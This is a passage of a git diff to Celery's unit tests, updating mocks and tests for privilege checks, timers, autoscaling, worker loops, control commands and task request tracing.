+ os_module.getegid.return_value = 60
+
+ grp_module.getgrgid.side_effect = KeyError
+
+ expected_message = ROOT_DISCOURAGED.format(uid=60, euid=60,
+ gid=60, egid=60)
+
+ check_privileges(accept_content)
+ assert len(recwarn) == 2
+
+ assert recwarn[0].message.args[0] == ASSUMING_ROOT
+ assert recwarn[1].message.args[0] == expected_message
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+@patch('celery.platforms.grp')
+def test_check_privileges_without_c_force_root_and_no_group_entry(
+ grp_module, os_module, accept_content, recwarn
+):
+ os_module.environ = {}
+ os_module.getuid.return_value = 60
+ os_module.getgid.return_value = 60
+ os_module.geteuid.return_value = 60
+ os_module.getegid.return_value = 60
+
+ grp_module.getgrgid.side_effect = KeyError
+
+ expected_message = re.escape(ROOT_DISALLOWED.format(uid=60, euid=60,
+ gid=60, egid=60))
+ with pytest.raises(SecurityError,
+ match=expected_message):
+ check_privileges(accept_content)
+
+ assert recwarn[0].message.args[0] == ASSUMING_ROOT
+
+
+def test_skip_checking_privileges_when_grp_is_unavailable(recwarn):
+ with patch("celery.platforms.grp", new=None):
check_privileges({'pickle'})
- finally:
- platforms.os = prev
+
+ assert len(recwarn) == 0
+
+
+def test_skip_checking_privileges_when_pwd_is_unavailable(recwarn):
+ with patch("celery.platforms.pwd", new=None):
+ check_privileges({'pickle'})
+
+ assert len(recwarn) == 0
diff --git a/t/unit/utils/test_saferepr.py b/t/unit/utils/test_saferepr.py
index e21fe25dbf7..68976f291ac 100644
--- a/t/unit/utils/test_saferepr.py
+++ b/t/unit/utils/test_saferepr.py
@@ -74,7 +74,7 @@ class list2(list):
class list3(list):
def __repr__(self):
- return list.__repr__(self)
+ return super().__repr__()
class tuple2(tuple):
@@ -84,7 +84,7 @@ class tuple2(tuple):
class tuple3(tuple):
def __repr__(self):
- return tuple.__repr__(self)
+ return super().__repr__()
class set2(set):
@@ -94,7 +94,7 @@ class set2(set):
class set3(set):
def __repr__(self):
- return set.__repr__(self)
+ return super().__repr__()
class frozenset2(frozenset):
@@ -104,7 +104,7 @@ class frozenset2(frozenset):
class frozenset3(frozenset):
def __repr__(self):
- return frozenset.__repr__(self)
+ return super().__repr__()
class dict2(dict):
@@ -114,7 +114,7 @@ class dict2(dict):
class dict3(dict):
def __repr__(self):
- return dict.__repr__(self)
+ return super().__repr__()
class test_saferepr:
diff --git a/t/unit/utils/test_serialization.py b/t/unit/utils/test_serialization.py
index 2f625fdb35f..bf83a0d68b5 100644
--- a/t/unit/utils/test_serialization.py
+++ b/t/unit/utils/test_serialization.py
@@ -6,7 +6,6 @@
import pytest
import pytz
-from case import mock
from kombu import Queue
from celery.utils.serialization import (STRTOBOOL_DEFAULT_TABLE,
@@ -18,14 +17,14 @@
class test_AAPickle:
- def test_no_cpickle(self):
+ @pytest.mark.masked_modules('cPickle')
+ def test_no_cpickle(self, mask_modules):
prev = sys.modules.pop('celery.utils.serialization', None)
try:
- with mock.mask_modules('cPickle'):
- import pickle as orig_pickle
+ import pickle as orig_pickle
- from celery.utils.serialization import pickle
- assert pickle.dumps is orig_pickle.dumps
+ from celery.utils.serialization import pickle
+ assert pickle.dumps is orig_pickle.dumps
finally:
sys.modules['celery.utils.serialization'] = prev
diff --git a/t/unit/utils/test_threads.py b/t/unit/utils/test_threads.py
index 758b39e4265..132f3504bc4 100644
--- a/t/unit/utils/test_threads.py
+++ b/t/unit/utils/test_threads.py
@@ -1,10 +1,10 @@
from unittest.mock import patch
import pytest
-from case import mock
from celery.utils.threads import (Local, LocalManager, _FastLocalStack,
_LocalStack, bgThread)
+from t.unit import conftest
class test_bgThread:
@@ -17,7 +17,7 @@ def body(self):
raise KeyError()
with patch('os._exit') as _exit:
- with mock.stdouts():
+ with conftest.stdouts():
_exit.side_effect = ValueError()
t = T()
with pytest.raises(ValueError):
diff --git a/t/unit/utils/test_timer2.py b/t/unit/utils/test_timer2.py
index fe022d8a345..9675452a571 100644
--- a/t/unit/utils/test_timer2.py
+++ b/t/unit/utils/test_timer2.py
@@ -44,14 +44,15 @@ def test_ensure_started_not_started(self):
t.start.assert_called_with()
@patch('celery.utils.timer2.sleep')
- def test_on_tick(self, sleep):
+ @patch('os._exit') # To ensure the test fails gracefully
+ def test_on_tick(self, _exit, sleep):
def next_entry_side_effect():
# side effect simulating following scenario:
# 3.33, 3.33, 3.33,
for _ in range(3):
yield 3.33
while True:
- yield t._is_shutdown.set()
+ yield getattr(t, "_Timer__is_shutdown").set()
on_tick = Mock(name='on_tick')
t = timer2.Timer(on_tick=on_tick)
@@ -61,6 +62,7 @@ def next_entry_side_effect():
t.run()
sleep.assert_called_with(3.33)
on_tick.assert_has_calls([call(3.33), call(3.33), call(3.33)])
+ _exit.assert_not_called()
@patch('os._exit')
def test_thread_crash(self, _exit):
@@ -72,12 +74,16 @@ def test_thread_crash(self, _exit):
def test_gc_race_lost(self):
t = timer2.Timer()
- t._is_stopped.set = Mock()
- t._is_stopped.set.side_effect = TypeError()
-
- t._is_shutdown.set()
- t.run()
- t._is_stopped.set.assert_called_with()
+ with patch.object(t, "_Timer__is_stopped") as mock_stop_event:
+ # Mark the timer as shutting down so we escape the run loop,
+ # mocking the running state so we don't block!
+ with patch.object(t, "running", new=False):
+ t.stop()
+ # Pretend that the interpreter has shut down and GCed built-in
+ # modules, causing an exception
+ mock_stop_event.set.side_effect = TypeError()
+ t.run()
+ mock_stop_event.set.assert_called_with()
def test_test_enter(self):
t = timer2.Timer()
diff --git a/t/unit/worker/test_autoscale.py b/t/unit/worker/test_autoscale.py
index 44742abf1ba..f6c63c57ac3 100644
--- a/t/unit/worker/test_autoscale.py
+++ b/t/unit/worker/test_autoscale.py
@@ -2,7 +2,7 @@
from time import monotonic
from unittest.mock import Mock, patch
-from case import mock
+import pytest
from celery.concurrency.base import BasePool
from celery.utils.objects import Bunch
@@ -90,16 +90,18 @@ def join(self, timeout=None):
worker = Mock(name='worker')
x = Scaler(self.pool, 10, 3, worker=worker)
- x._is_stopped.set()
- x.stop()
+ # Don't allow thread joining or event waiting to block the test
+ with patch("threading.Thread.join"), patch("threading.Event.wait"):
+ x.stop()
assert x.joined
x.joined = False
x.alive = False
- x.stop()
+ with patch("threading.Thread.join"), patch("threading.Event.wait"):
+ x.stop()
assert not x.joined
- @mock.sleepdeprived(module=autoscale)
- def test_body(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_body(self, sleepdeprived):
worker = Mock(name='worker')
x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker)
x.body()
@@ -123,13 +125,13 @@ class Scaler(autoscale.Autoscaler):
def body(self):
self.scale_called = True
- self._is_shutdown.set()
+ getattr(self, "_bgThread__is_shutdown").set()
worker = Mock(name='worker')
x = Scaler(self.pool, 10, 3, worker=worker)
x.run()
- assert x._is_shutdown.isSet()
- assert x._is_stopped.isSet()
+ assert getattr(x, "_bgThread__is_shutdown").is_set()
+ assert getattr(x, "_bgThread__is_stopped").is_set()
assert x.scale_called
def test_shrink_raises_exception(self):
@@ -200,7 +202,7 @@ def test_thread_crash(self, _exit):
class _Autoscaler(autoscale.Autoscaler):
def body(self):
- self._is_shutdown.set()
+ getattr(self, "_bgThread__is_shutdown").set()
raise OSError('foo')
worker = Mock(name='worker')
x = _Autoscaler(self.pool, 10, 3, worker=worker)
@@ -214,8 +216,8 @@ def body(self):
_exit.assert_called_with(1)
stderr.write.assert_called()
- @mock.sleepdeprived(module=autoscale)
- def test_no_negative_scale(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_no_negative_scale(self, sleepdeprived):
total_num_processes = []
worker = Mock(name='worker')
x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker)
diff --git a/t/unit/worker/test_consumer.py b/t/unit/worker/test_consumer.py
index f7530ef6b37..0e7ce90818f 100644
--- a/t/unit/worker/test_consumer.py
+++ b/t/unit/worker/test_consumer.py
@@ -5,15 +5,17 @@
import pytest
from billiard.exceptions import RestartFreqExceeded
-from case import ContextMock
+from celery.contrib.testing.mocks import ContextMock
from celery.utils.collections import LimitedSet
from celery.worker.consumer.agent import Agent
-from celery.worker.consumer.consumer import CLOSE, TERMINATE, Consumer
+from celery.worker.consumer.consumer import (CANCEL_TASKS_BY_DEFAULT, CLOSE,
+ TERMINATE, Consumer)
from celery.worker.consumer.gossip import Gossip
from celery.worker.consumer.heart import Heart
from celery.worker.consumer.mingle import Mingle
from celery.worker.consumer.tasks import Tasks
+from celery.worker.state import active_requests
class test_Consumer:
@@ -272,6 +274,39 @@ def test_connect_error_handler_progress(self, error):
errback(Mock(), 6)
assert error.call_args[0][3] == 'Trying again in 6.00 seconds... (3/3)'
+ def test_cancel_long_running_tasks_on_connection_loss(self):
+ c = self.get_consumer()
+ c.app.conf.worker_cancel_long_running_tasks_on_connection_loss = True
+
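+ # Only unacknowledged acks_late requests should be cancelled on connection loss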
+ mock_request_acks_late_not_acknowledged = Mock()
+ mock_request_acks_late_not_acknowledged.task.acks_late = True
+ mock_request_acks_late_not_acknowledged.acknowledged = False
+ mock_request_acks_late_acknowledged = Mock()
+ mock_request_acks_late_acknowledged.task.acks_late = True
+ mock_request_acks_late_acknowledged.acknowledged = True
+ mock_request_acks_early = Mock()
+ mock_request_acks_early.task.acks_late = False
+ mock_request_acks_early.acknowledged = False
+
+ active_requests.add(mock_request_acks_late_not_acknowledged)
+ active_requests.add(mock_request_acks_late_acknowledged)
+ active_requests.add(mock_request_acks_early)
+
+ c.on_connection_error_after_connected(Mock())
+
+ mock_request_acks_late_not_acknowledged.cancel.assert_called_once_with(c.pool)
+ mock_request_acks_late_acknowledged.cancel.assert_not_called()
+ mock_request_acks_early.cancel.assert_not_called()
+
+ active_requests.clear()
+
+ def test_cancel_long_running_tasks_on_connection_loss__warning(self):
+ c = self.get_consumer()
+ c.app.conf.worker_cancel_long_running_tasks_on_connection_loss = False
+
+ with pytest.deprecated_call(match=CANCEL_TASKS_BY_DEFAULT):
+ c.on_connection_error_after_connected(Mock())
+
class test_Heart:
diff --git a/t/unit/worker/test_control.py b/t/unit/worker/test_control.py
index c2edc58696c..0d53d65e3bc 100644
--- a/t/unit/worker/test_control.py
+++ b/t/unit/worker/test_control.py
@@ -1,5 +1,6 @@
import socket
import sys
+import time
from collections import defaultdict
from datetime import datetime, timedelta
from queue import Queue as FastQueue
@@ -11,12 +12,12 @@
from celery.utils.collections import AttributeDict
from celery.utils.timer2 import Timer
-from celery.worker import WorkController as _WC # noqa
+from celery.worker import WorkController as _WC
from celery.worker import consumer, control
from celery.worker import state as worker_state
from celery.worker.pidbox import Pidbox, gPidbox
from celery.worker.request import Request
-from celery.worker.state import revoked
+from celery.worker.state import REVOKE_EXPIRES, revoked
hostname = socket.gethostname()
@@ -192,6 +193,22 @@ def test_hello(self):
finally:
worker_state.revoked.discard('revoked1')
+ def test_hello_does_not_send_expired_revoked_items(self):
+ consumer = Consumer(self.app)
+ panel = self.create_panel(consumer=consumer)
+ panel.state.app.clock.value = 313
+ panel.state.hostname = 'elaine@vandelay.com'
+ # Add an expired revoked item to the revoked set.
+ worker_state.revoked.add(
+ 'expired_in_past',
+ now=time.monotonic() - REVOKE_EXPIRES - 1
+ )
+ x = panel.handle('hello', {
+ 'from_node': 'george@vandelay.com',
+ 'revoked': {'1234', '4567', '891'}
+ })
+ assert 'expired_in_past' not in x['revoked']
+
def test_conf(self):
consumer = Consumer(self.app)
panel = self.create_panel(consumer=consumer)
@@ -298,6 +315,20 @@ def test_active(self):
finally:
worker_state.active_requests.discard(r)
+ def test_active_safe(self):
+ kwargsrepr = ''
+ r = Request(
+ self.TaskMessage(self.mytask.name, id='do re mi',
+ kwargsrepr=kwargsrepr),
+ app=self.app,
+ )
+ worker_state.active_requests.add(r)
+ try:
+ active_resp = self.panel.handle('dump_active', {'safe': True})
+ assert active_resp[0]['kwargs'] == kwargsrepr
+ finally:
+ worker_state.active_requests.discard(r)
+
def test_pool_grow(self):
class MockPool:
diff --git a/t/unit/worker/test_loops.py b/t/unit/worker/test_loops.py
index 27d1b832ea0..2b2db226554 100644
--- a/t/unit/worker/test_loops.py
+++ b/t/unit/worker/test_loops.py
@@ -158,9 +158,10 @@ def test_setup_heartbeat(self):
asynloop(*x.args)
x.consumer.consume.assert_called_with()
x.obj.on_ready.assert_called_with()
- x.hub.timer.call_repeatedly.assert_called_with(
- 10 / 2.0, x.connection.heartbeat_check, (2.0,),
- )
+ last_call_args, _ = x.hub.timer.call_repeatedly.call_args
+
+ assert last_call_args[0] == 10 / 2.0
+ assert last_call_args[2] == (2.0,)
def task_context(self, sig, **kwargs):
x, on_task = get_task_callback(self.app, **kwargs)
@@ -429,6 +430,30 @@ def test_poll_raises_ValueError(self):
asynloop(*x.args)
poller.poll.assert_called()
+ def test_heartbeat_error(self):
+ x = X(self.app, heartbeat=10)
+ x.connection.heartbeat_check = Mock(
+ side_effect=RuntimeError("Heartbeat error")
+ )
+
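+ # Invoke the heartbeat callback immediately instead of scheduling it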
+ def call_repeatedly(rate, fn, args):
+ fn(*args)
+
+ x.hub.timer.call_repeatedly = call_repeatedly
+ with pytest.raises(RuntimeError):
+ asynloop(*x.args)
+
+ def test_no_heartbeat_support(self):
+ x = X(self.app)
+ x.connection.supports_heartbeats = False
+ x.hub.timer.call_repeatedly = Mock(
+ name='x.hub.timer.call_repeatedly()'
+ )
+ x.hub.on_tick.add(x.closer(mod=2))
+ asynloop(*x.args)
+
+ x.hub.timer.call_repeatedly.assert_not_called()
+
class test_synloop:
@@ -459,6 +484,49 @@ def test_ignores_socket_errors_when_closed(self):
x.close_then_error(x.connection.drain_events)
assert synloop(*x.args) is None
+ def test_no_connection(self):
+ x = X(self.app)
+ x.connection = None
+ x.hub.timer.call_repeatedly = Mock(
+ name='x.hub.timer.call_repeatedly()'
+ )
+ x.blueprint.state = CLOSE
+ synloop(*x.args)
+
+ x.hub.timer.call_repeatedly.assert_not_called()
+
+ def test_heartbeat_error(self):
+ x = X(self.app, heartbeat=10)
+ x.obj.pool.is_green = True
+
+ def heartbeat_check(rate):
+ raise RuntimeError('Heartbeat error')
+
+ def call_repeatedly(rate, fn, args):
+ fn(*args)
+
+ x.connection.heartbeat_check = Mock(
+ name='heartbeat_check', side_effect=heartbeat_check
+ )
+ x.obj.timer.call_repeatedly = call_repeatedly
+ with pytest.raises(RuntimeError):
+ synloop(*x.args)
+
+ def test_no_heartbeat_support(self):
+ x = X(self.app)
+ x.connection.supports_heartbeats = False
+ x.obj.pool.is_green = True
+ x.obj.timer.call_repeatedly = Mock(
+ name='x.obj.timer.call_repeatedly()'
+ )
+
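+ # Close the blueprint on the first drain so synloop exits after one pass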
+ def drain_events(timeout):
+ x.blueprint.state = CLOSE
+ x.connection.drain_events.side_effect = drain_events
+ synloop(*x.args)
+
+ x.obj.timer.call_repeatedly.assert_not_called()
+
class test_quick_drain:
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index 039af717b2d..2c49f777103 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -2,25 +2,24 @@
import os
import signal
import socket
-import sys
from datetime import datetime, timedelta
from time import monotonic, time
from unittest.mock import Mock, patch
import pytest
from billiard.einfo import ExceptionInfo
-from kombu.utils.encoding import (default_encode, from_utf8, safe_repr,
- safe_str)
+from kombu.utils.encoding import from_utf8, safe_repr, safe_str
from kombu.utils.uuid import uuid
from celery import states
-from celery.app.trace import (TraceInfo, _trace_task_ret, build_tracer,
+from celery.app.trace import (TraceInfo, build_tracer, fast_trace_task,
mro_lookup, reset_worker_optimizations,
- setup_worker_optimizations, trace_task)
+ setup_worker_optimizations, trace_task,
+ trace_task_ret)
from celery.backends.base import BaseDictBackend
from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry,
TaskRevokedError, Terminated, WorkerLostError)
-from celery.signals import task_revoked
+from celery.signals import task_failure, task_retry, task_revoked
from celery.worker import request as module
from celery.worker import strategy
from celery.worker.request import Request, create_request_cls
@@ -36,16 +35,19 @@ def setup(self):
@self.app.task(shared=False)
def add(x, y, **kw_):
return x + y
+
self.add = add
@self.app.task(shared=False)
def mytask(i, **kwargs):
return i ** i
+
self.mytask = mytask
@self.app.task(shared=False)
def mytask_raising(i):
raise KeyError(i)
+
self.mytask_raising = mytask_raising
def xRequest(self, name=None, id=None, args=None, kwargs=None,
@@ -64,7 +66,6 @@ def xRequest(self, name=None, id=None, args=None, kwargs=None,
class test_mro_lookup:
def test_order(self):
-
class A:
pass
@@ -90,8 +91,9 @@ def mro(cls):
assert mro_lookup(D, 'x') is None
-def jail(app, task_id, name, args, kwargs):
+def jail(app, task_id, name, request_opts, args, kwargs):
request = {'id': task_id}
+ request.update(request_opts)
task = app.tasks[name]
task.__trace__ = None # rebuild
return trace_task(
@@ -99,29 +101,6 @@ def jail(app, task_id, name, args, kwargs):
).retval
-@pytest.mark.skipif(sys.version_info[0] > 3, reason='Py2 only')
-class test_default_encode:
-
- def test_jython(self):
- prev, sys.platform = sys.platform, 'java 1.6.1'
- try:
- assert default_encode(b'foo') == b'foo'
- finally:
- sys.platform = prev
-
- def test_cpython(self):
- prev, sys.platform = sys.platform, 'darwin'
- gfe, sys.getfilesystemencoding = (
- sys.getfilesystemencoding,
- lambda: 'utf-8',
- )
- try:
- assert default_encode(b'foo') == b'foo'
- finally:
- sys.platform = prev
- sys.getfilesystemencoding = gfe
-
-
class test_Retry:
def test_retry_semipredicate(self):
@@ -139,7 +118,7 @@ def test_process_cleanup_fails(self, patching):
self.mytask.backend = Mock()
self.mytask.backend.process_cleanup = Mock(side_effect=KeyError())
tid = uuid()
- ret = jail(self.app, tid, self.mytask.name, [2], {})
+ ret = jail(self.app, tid, self.mytask.name, {}, [2], {})
assert ret == 4
self.mytask.backend.mark_as_done.assert_called()
assert 'Process cleanup failed' in _logger.error.call_args[0][0]
@@ -148,10 +127,10 @@ def test_process_cleanup_BaseException(self):
self.mytask.backend = Mock()
self.mytask.backend.process_cleanup = Mock(side_effect=SystemExit())
with pytest.raises(SystemExit):
- jail(self.app, uuid(), self.mytask.name, [2], {})
+ jail(self.app, uuid(), self.mytask.name, {}, [2], {})
def test_execute_jail_success(self):
- ret = jail(self.app, uuid(), self.mytask.name, [2], {})
+ ret = jail(self.app, uuid(), self.mytask.name, {}, [2], {})
assert ret == 4
def test_marked_as_started(self):
@@ -160,34 +139,47 @@ def test_marked_as_started(self):
def store_result(tid, meta, state, **kwargs):
if state == states.STARTED:
_started.append(tid)
+
self.mytask.backend.store_result = Mock(name='store_result')
self.mytask.backend.store_result.side_effect = store_result
self.mytask.track_started = True
tid = uuid()
- jail(self.app, tid, self.mytask.name, [2], {})
+ jail(self.app, tid, self.mytask.name, {}, [2], {})
assert tid in _started
self.mytask.ignore_result = True
tid = uuid()
- jail(self.app, tid, self.mytask.name, [2], {})
+ jail(self.app, tid, self.mytask.name, {}, [2], {})
assert tid not in _started
def test_execute_jail_failure(self):
ret = jail(
- self.app, uuid(), self.mytask_raising.name, [4], {},
+ self.app, uuid(), self.mytask_raising.name, {}, [4], {},
)
assert isinstance(ret, ExceptionInfo)
assert ret.exception.args == (4,)
- def test_execute_ignore_result(self):
-
+ def test_execute_task_ignore_result(self):
@self.app.task(shared=False, ignore_result=True)
def ignores_result(i):
return i ** i
task_id = uuid()
- ret = jail(self.app, task_id, ignores_result.name, [4], {})
+ ret = jail(self.app, task_id, ignores_result.name, {}, [4], {})
+ assert ret == 256
+ assert not self.app.AsyncResult(task_id).ready()
+
+ def test_execute_request_ignore_result(self):
+ @self.app.task(shared=False)
+ def ignores_result(i):
+ return i ** i
+
+ task_id = uuid()
+ ret = jail(
+ self.app, task_id, ignores_result.name,
+ {'ignore_result': True}, [4], {}
+ )
assert ret == 256
assert not self.app.AsyncResult(task_id).ready()
@@ -236,16 +228,20 @@ def test_info_function(self):
import string
kwargs = {}
for i in range(0, 2):
- kwargs[str(i)] = ''.join(random.choice(string.ascii_lowercase) for i in range(1000))
+ kwargs[str(i)] = ''.join(
+ random.choice(string.ascii_lowercase) for i in range(1000))
assert self.get_request(
- self.add.s(**kwargs)).info(safe=True).get('kwargs') == kwargs
+ self.add.s(**kwargs)).info(safe=True).get(
+ 'kwargs') == '' # mock message doesn't populate kwargsrepr
assert self.get_request(
self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs
args = []
for i in range(0, 2):
- args.append(''.join(random.choice(string.ascii_lowercase) for i in range(1000)))
+ args.append(''.join(
+ random.choice(string.ascii_lowercase) for i in range(1000)))
assert list(self.get_request(
- self.add.s(*args)).info(safe=True).get('args')) == args
+ self.add.s(*args)).info(safe=True).get(
+ 'args')) == [] # mock message doesn't populate argsrepr
assert list(self.get_request(
self.add.s(*args)).info(safe=False).get('args')) == args
@@ -341,32 +337,69 @@ def test_on_failure_Reject_rejects_with_requeue(self):
)
def test_on_failure_WorkerLostError_rejects_with_requeue(self):
- einfo = None
try:
raise WorkerLostError()
except WorkerLostError:
einfo = ExceptionInfo(internal=True)
+
req = self.get_request(self.add.s(2, 2))
req.task.acks_late = True
req.task.reject_on_worker_lost = True
req.delivery_info['redelivered'] = False
+ req.task.backend = Mock()
+
req.on_failure(einfo)
+
req.on_reject.assert_called_with(
req_logger, req.connection_errors, True)
+ req.task.backend.mark_as_failure.assert_not_called()
def test_on_failure_WorkerLostError_redelivered_None(self):
- einfo = None
try:
raise WorkerLostError()
except WorkerLostError:
einfo = ExceptionInfo(internal=True)
+
req = self.get_request(self.add.s(2, 2))
req.task.acks_late = True
req.task.reject_on_worker_lost = True
req.delivery_info['redelivered'] = None
+ req.task.backend = Mock()
+
req.on_failure(einfo)
+
req.on_reject.assert_called_with(
req_logger, req.connection_errors, True)
+ req.task.backend.mark_as_failure.assert_not_called()
+
+ def test_on_failure_WorkerLostError_redelivered_True(self):
+ try:
+ raise WorkerLostError()
+ except WorkerLostError:
+ einfo = ExceptionInfo(internal=True)
+
+ req = self.get_request(self.add.s(2, 2))
+ req.task.acks_late = False
+ req.task.reject_on_worker_lost = True
+ req.delivery_info['redelivered'] = True
+ req.task.backend = Mock()
+
+ with self.assert_signal_called(
+ task_failure,
+ sender=req.task,
+ task_id=req.id,
+ exception=einfo.exception,
+ args=req.args,
+ kwargs=req.kwargs,
+ traceback=einfo.traceback,
+ einfo=einfo
+ ):
+ req.on_failure(einfo)
+
+ req.task.backend.mark_as_failure.assert_called_once_with(req.id,
+ einfo.exception,
+ request=req._context,
+ store_result=True)
def test_tzlocal_is_cached(self):
req = self.get_request(self.add.s(2, 2))
@@ -458,6 +491,23 @@ def test_terminate__task_started(self):
job.terminate(pool, signal='TERM')
pool.terminate_job.assert_called_with(job.worker_pid, signum)
+ def test_cancel__pool_ref(self):
+ pool = Mock()
+ signum = signal.SIGTERM
+ job = self.get_request(self.mytask.s(1, f='x'))
+ job._apply_result = Mock(name='_apply_result')
+ with self.assert_signal_called(
+ task_retry, sender=job.task, request=job._context,
+ einfo=None):
+ job.time_start = monotonic()
+ job.worker_pid = 314
+ job.cancel(pool, signal='TERM')
+ job._apply_result().terminate.assert_called_with(signum)
+
+ job._apply_result = Mock(name='_apply_result2')
+ job._apply_result.return_value = None
+ job.cancel(pool, signal='TERM')
+
def test_terminate__task_reserved(self):
pool = Mock()
job = self.get_request(self.mytask.s(1, f='x'))
@@ -467,6 +517,27 @@ def test_terminate__task_reserved(self):
assert job._terminate_on_ack == (pool, 15)
job.terminate(pool, signal='TERM')
+ def test_cancel__task_started(self):
+ pool = Mock()
+ signum = signal.SIGTERM
+ job = self.get_request(self.mytask.s(1, f='x'))
+ job._apply_result = Mock(name='_apply_result')
+ with self.assert_signal_called(
+ task_retry, sender=job.task, request=job._context,
+ einfo=None):
+ job.time_start = monotonic()
+ job.worker_pid = 314
+ job.cancel(pool, signal='TERM')
+ job._apply_result().terminate.assert_called_with(signum)
+
+ def test_cancel__task_reserved(self):
+ pool = Mock()
+ job = self.get_request(self.mytask.s(1, f='x'))
+ job.time_start = None
+ job.cancel(pool, signal='TERM')
+ pool.terminate_job.assert_not_called()
+ assert job._terminate_on_ack is None
+
def test_revoked_expires_expired(self):
job = self.get_request(self.mytask.s(1, f='x').set(
expires=datetime.utcnow() - timedelta(days=1)
@@ -676,7 +747,8 @@ def test_on_failure_acks_on_failure_or_timeout_disabled_for_task(self):
job.on_failure(exc_info)
assert job.acknowledged is True
- job._on_reject.assert_called_with(req_logger, job.connection_errors, False)
+ job._on_reject.assert_called_with(req_logger, job.connection_errors,
+ False)
def test_on_failure_acks_on_failure_or_timeout_enabled_for_task(self):
job = self.xRequest()
@@ -718,6 +790,22 @@ def test_on_failure_acks_on_failure_or_timeout_enabled(self):
job.on_failure(exc_info)
assert job.acknowledged is True
+ def test_on_failure_task_cancelled(self):
+ job = self.xRequest()
+ job.eventer = Mock()
+ job.time_start = 1
+ job._already_cancelled = True
+
+ try:
+ raise Terminated()
+ except Terminated:
+ exc_info = ExceptionInfo()
+
+ job.on_failure(exc_info)
+
+ assert not job.eventer.send.called
+
def test_from_message_invalid_kwargs(self):
m = self.TaskMessage(self.mytask.name, args=(), kwargs='foo')
req = Request(m, app=self.app)
@@ -786,9 +874,9 @@ def test_on_soft_timeout(self, patching):
assert self.mytask.backend.get_status(job.id) == states.PENDING
def test_fast_trace_task(self):
- from celery.app import trace
+ assert self.app.use_fast_trace_task is False
setup_worker_optimizations(self.app)
- assert trace.trace_task_ret is trace._fast_trace_task
+ assert self.app.use_fast_trace_task is True
tid = uuid()
message = self.TaskMessage(self.mytask.name, tid, args=[4])
assert len(message.payload) == 3
@@ -797,7 +885,7 @@ def test_fast_trace_task(self):
self.mytask.name, self.mytask, self.app.loader, 'test',
app=self.app,
)
- failed, res, runtime = trace.trace_task_ret(
+ failed, res, runtime = fast_trace_task(
self.mytask.name, tid, message.headers, message.body,
message.content_type, message.content_encoding)
assert not failed
@@ -805,10 +893,10 @@ def test_fast_trace_task(self):
assert runtime is not None
assert isinstance(runtime, numbers.Real)
finally:
- reset_worker_optimizations()
- assert trace.trace_task_ret is trace._trace_task_ret
+ reset_worker_optimizations(self.app)
+ assert self.app.use_fast_trace_task is False
delattr(self.mytask, '__trace__')
- failed, res, runtime = trace.trace_task_ret(
+ failed, res, runtime = trace_task_ret(
self.mytask.name, tid, message.headers, message.body,
message.content_type, message.content_encoding, app=self.app,
)
@@ -824,7 +912,7 @@ def test_trace_task_ret(self):
)
tid = uuid()
message = self.TaskMessage(self.mytask.name, tid, args=[4])
- _, R, _ = _trace_task_ret(
+ _, R, _ = trace_task_ret(
self.mytask.name, tid, message.headers,
message.body, message.content_type,
message.content_encoding, app=self.app,
@@ -838,7 +926,7 @@ def test_trace_task_ret__no_trace(self):
pass
tid = uuid()
message = self.TaskMessage(self.mytask.name, tid, args=[4])
- _, R, _ = _trace_task_ret(
+ _, R, _ = trace_task_ret(
self.mytask.name, tid, message.headers,
message.body, message.content_type,
message.content_encoding, app=self.app,
@@ -1007,6 +1095,23 @@ def test_execute_using_pool(self):
p = Mock()
job.execute_using_pool(p)
p.apply_async.assert_called_once()
+ trace = p.apply_async.call_args[0][0]
+ assert trace == trace_task_ret
+ args = p.apply_async.call_args[1]['args']
+ assert args[0] == self.mytask.name
+ assert args[1] == tid
+ assert args[2] == job.request_dict
+ assert args[3] == job.message.body
+
+ def test_execute_using_pool_fast_trace_task(self):
+ self.app.use_fast_trace_task = True
+ tid = uuid()
+ job = self.xRequest(id=tid, args=[4])
+ p = Mock()
+ job.execute_using_pool(p)
+ p.apply_async.assert_called_once()
+ trace = p.apply_async.call_args[0][0]
+ assert trace == fast_trace_task
args = p.apply_async.call_args[1]['args']
assert args[0] == self.mytask.name
assert args[1] == tid
@@ -1075,11 +1180,12 @@ def setup(self):
self.task = Mock(name='task')
self.pool = Mock(name='pool')
self.eventer = Mock(name='eventer')
- RequestCase.setup(self)
+ super().setup()
def create_request_cls(self, **kwargs):
return create_request_cls(
- Request, self.task, self.pool, 'foo', self.eventer, **kwargs
+ Request, self.task, self.pool, 'foo', self.eventer, app=self.app,
+ **kwargs
)
def zRequest(self, Request=None, revoked_tasks=None, ref=None, **kwargs):
@@ -1158,12 +1264,32 @@ def test_execute_using_pool__expired(self):
job.execute_using_pool(self.pool)
def test_execute_using_pool(self):
- from celery.app.trace import trace_task_ret as trace
weakref_ref = Mock(name='weakref.ref')
job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref)
job.execute_using_pool(self.pool)
self.pool.apply_async.assert_called_with(
- trace,
+ trace_task_ret,
+ args=(job.type, job.id, job.request_dict, job.body,
+ job.content_type, job.content_encoding),
+ accept_callback=job.on_accepted,
+ timeout_callback=job.on_timeout,
+ callback=job.on_success,
+ error_callback=job.on_failure,
+ soft_timeout=self.task.soft_time_limit,
+ timeout=self.task.time_limit,
+ correlation_id=job.id,
+ )
+ assert job._apply_result
+ weakref_ref.assert_called_with(self.pool.apply_async())
+ assert job._apply_result is weakref_ref()
+
+ def test_execute_using_pool_with_use_fast_trace_task(self):
+ self.app.use_fast_trace_task = True
+ weakref_ref = Mock(name='weakref.ref')
+ job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref)
+ job.execute_using_pool(self.pool)
+ self.pool.apply_async.assert_called_with(
+ fast_trace_task,
args=(job.type, job.id, job.request_dict, job.body,
job.content_type, job.content_encoding),
accept_callback=job.on_accepted,
@@ -1179,7 +1305,6 @@ def test_execute_using_pool(self):
assert job._apply_result is weakref_ref()
def test_execute_using_pool_with_none_timelimit_header(self):
- from celery.app.trace import trace_task_ret as trace
